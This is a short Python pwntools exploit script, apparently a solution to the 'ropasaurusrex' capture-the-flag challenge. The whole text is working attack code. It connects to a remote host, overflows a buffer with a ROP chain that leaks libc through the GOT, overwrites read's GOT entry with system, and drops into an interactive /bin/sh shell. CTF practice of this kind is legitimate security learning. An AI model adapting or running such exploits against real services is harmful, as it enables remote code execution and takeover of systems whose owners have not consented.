Ropasaurusrex
from pwn import *
from time import *
s = remote("52.79.124.141",44444)
read_plt = 0x804832c
write_plt = 0x804830c
read_got = 0x0804961c
pppr = 0x80484b6
bin_sh = "/bin/sh\x00"
bin_sh_addr = 0x08049530
offset_read = 0x000d5c00
offset_system = 0x0003ad80
junk = "A" * 140
payload = junk
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bin_sh_addr)
payload += p32(len(bin_sh))
payload += p32(write_plt)
payload += p32(pppr) #return
payload += p32(1) #stdout
payload += p32(read_got)
payload += p32(4) # 4
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(4)
payload += p32(read_plt)
payload += "BBBB"
payload += p32(bin_sh_addr)
#s = process(_bin)
s.sendline(payload)
sleep(1)
s.send(bin_sh)
libc_read = u32(s.recv(4))
libc_base = libc_read - offset_read
libc_system = libc_base + offset_system
print '[+] read libc :', hex(libc_read)
print '[+] libc_base : ', hex(libc_base)
print '[+] system libc :', hex(libc_system)
sleep(1)
s.send(p32(libc_system))
s.interactive()